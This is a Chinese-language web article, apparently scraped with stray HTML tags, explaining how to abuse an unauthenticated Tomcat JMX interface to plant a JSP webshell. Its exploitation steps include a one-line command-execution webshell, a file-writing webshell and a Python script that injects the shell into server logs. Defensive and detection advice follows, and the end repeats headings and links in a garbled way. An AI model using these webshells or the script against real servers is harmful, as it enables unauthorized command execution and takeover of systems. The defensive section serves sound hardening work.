利用Tomcat JMX端口上传WebShell技术分析<\/h1>

一、技术背景<\/h2>
Tomcat的JMX(Java Management Extensions)管理接口如果配置不当，特别是当配置为无认证访问时，攻击者可以利用该接口获取敏感信息并上传WebShell。本技术主要针对Tomcat JMX管理接口未正确配置认证机制的安全漏洞。<\/p>

二、漏洞利用前提条件<\/h2>

Tomcat JMX接口暴露在外网或内网可访问<\/li>
JMX配置为无密码访问(authenticate=false)<\/li>

JMX未启用SSL加密(ssl=false)<\/li> <\/ol>

三、详细利用步骤<\/h2>

1. 配置Tomcat JMX无认证访问<\/h3>

修改Tomcat启动脚本catalina.sh<\/code>，添加以下配置：<\/p>

CATALINA_OPTS=<\/span>"<\/span>$JAVA_OPTS -Djava.rmi.server.hostname=192.168.1.100 -Dcom.sun.management.jmxremote.port=1099 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false"<\/span>
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

java.rmi.server.hostname<\/code>: 指定JMX服务绑定的主机IP<\/li>
com.sun.management.jmxremote.port<\/code>: JMX服务监听端口(1099)<\/li>
com.sun.management.jmxremote.authenticate<\/code>: 是否启用认证(false表示不启用)<\/li>
com.sun.management.jmxremote.ssl<\/code>: 是否启用SSL加密(false表示不启用)<\/li>
<\/ul>
修改后重启Tomcat服务：<\/p>
.\/shutdown.sh
<\/span><\/span>.\/startup.sh
<\/span><\/span><\/code><\/pre>2. 连接JMX服务获取信息<\/h3>
本地运行jconsole连接JMX服务：<\/p>

在Windows运行框中输入jconsole<\/code><\/li>
连接到远程进程：service:jmx:rmi:\/\/\/jndi\/rmi:\/\/192.168.1.100:1099\/jmxrmi<\/code><\/li>
<\/ol>
通过JMX可以获取以下关键信息：<\/p>

Tomcat的web主目录：Dcatalina.home=\/opt\/apache-tomcat-8.0.3<\/code><\/li>
\/manager\/html<\/code>后台的访问密码<\/li>
<\/ul>
3. 上传WebShell<\/h3>
通过JMX的MBeans操作上传WebShell：<\/p>

导航路径：MBeans -> Catalina -> Valve -> localhost -> AccessLogValue -> 操作<\/code><\/li>
写入JSP后门文件路径：..\/webapps\/docs\/test11.jsp<\/code><\/li>
实际写入路径：\/opt\/apache-tomcat-8.0.3\/webapps\/docs\/test11.jsp<\/code><\/li>
<\/ol>
4. WebShell代码示例<\/h3>
简单命令执行WebShell：<\/h4>
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
<\/code><\/pre>
高级文件管理WebShell：<\/h4>
<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"\/>
<jsp:directive.page import="java.io.OutputStream"\/>
<jsp:directive.page import="java.io.FileOutputStream"\/>
<% 
int i=0;
String method=request.getParameter("act");
if(method!=null && method.equals("yoco")){
    String url=request.getParameter("url");
    String text=request.getParameter("smart");
    File f=new File(url);
    if(f.exists()){
        f.delete();
    }
    try{
        OutputStream o=new FileOutputStream(f);
        o.write(text.getBytes());
        o.close();
    }catch(Exception e){
        i++;
        %>0<%
    }
}
if(i==0){
    %>1<%
}
%>
<form action='?act=yoco' method='post'>
<input size="100" value="<%=application.getRealPath("\/")%>" name="url"><br>
<textarea rows="20" cols="80" name="smart"><\/textarea>
<input type="submit" value="Save">
<\/form>
<\/code><\/pre>
5. 自动化利用脚本(jmx.py)<\/h3>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span>#coding=utf8<\/span>
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> urlparse
<\/span><\/span>import<\/span> urllib2
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    url =<\/span> 'http:\/\/192.168.1.100:8080'<\/span>
<\/span><\/span>    reqBind =<\/span> '''\/test?<%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="java.io.File"\/><jsp:directive.page import="java.io.OutputStream"\/><jsp:directive.page import="java.io.FileOutputStream"\/><<\/span>%i<\/span>nt i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>0<%}}if(i==0){%>1<%}%><form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("\/")%>" name="url"><br><textarea rows="20" cols="80" name="smart">'''<\/span>
<\/span><\/span>    reqBind =<\/span> reqBind.<\/span>decode('utf-8'<\/span>)
<\/span><\/span>    proxies =<\/span> {"http"<\/span>:"http:\/\/127.0.0.1:8080"<\/span>}
<\/span><\/span>    try<\/span>:
<\/span><\/span>        print "<\/span>\n<\/span>[*]webshell:"<\/span>
<\/span><\/span>        print url +<\/span> "\/docs\/test11.jsp"<\/span>
<\/span><\/span>        request =<\/span> urllib2.<\/span>Request(url+<\/span>reqBind)
<\/span><\/span>        request.<\/span>add_header('User-Agent'<\/span>, 'Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko\/20100101 Firefox\/21.0'<\/span>)
<\/span><\/span>        request.<\/span>add_header('Accept-Language'<\/span>, 'en-us;q=0.5,en;q=0.3'<\/span>)
<\/span><\/span>        request.<\/span>add_header('Referer'<\/span>, request.<\/span>get_full_url())
<\/span><\/span>        u =<\/span> urllib2.<\/span>urlopen(request, timeout=<\/span>3<\/span>)
<\/span><\/span>        content =<\/span> u.<\/span>read()
<\/span><\/span>        content =<\/span> content.<\/span>encode("utf-8"<\/span>)
<\/span><\/span>        print "<\/span>\n<\/span>[*]response:<\/span>\n<\/span>"<\/span>
<\/span><\/span>        print content
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        print e
<\/span><\/span><\/code><\/pre>四、防御措施<\/h2>

启用JMX认证<\/strong>：设置-Dcom.sun.management.jmxremote.authenticate=true<\/code><\/li>
配置强密码<\/strong>：修改jmxremote.password<\/code>文件设置复杂密码<\/li>
启用SSL加密<\/strong>：设置-Dcom.sun.management.jmxremote.ssl=true<\/code><\/li>
限制访问IP<\/strong>：通过防火墙限制JMX端口的访问来源<\/li>
监控JMX端口<\/strong>：对JMX端口的异常连接进行监控和告警<\/li>
最小权限原则<\/strong>：不要使用root或管理员权限运行Tomcat<\/li>
<\/ol>
五、检测方法<\/h2>

使用nmap扫描目标服务器1099端口是否开放<\/li>
尝试使用jconsole连接JMX服务，检查是否需要认证<\/li>
检查Tomcat启动参数是否包含不安全的JMX配置<\/li>
<\/ol>
六、漏洞影响<\/h2>
成功利用此漏洞攻击者可以：<\/p>

获取Tomcat服务器敏感配置信息<\/li>
上传WebShell获取服务器控制权<\/li>
执行任意系统命令<\/li>
读写服务器文件系统<\/li>
进一步渗透内网其他系统<\/li>
<\/ol>
七、参考链接<\/h2>

Tomcat JMX配置参考<\/a><\/li>
Oracle官方JMX文档<\/a><\/li>
<\/ol>

利用Tomcat JMX端口上传WebShell技术分析<\/h1>

三、详细利用步骤<\/h2>

4. WebShell代码示例<\/h3>

七、参考链接<\/h2> Tomcat JMX配置参考<\/a><\/li> Oracle官方JMX文档<\/a><\/li> <\/ol>

七、参考链接<\/h2>

Tomcat JMX配置参考<\/a><\/li>
Oracle官方JMX文档<\/a><\/li> <\/ol>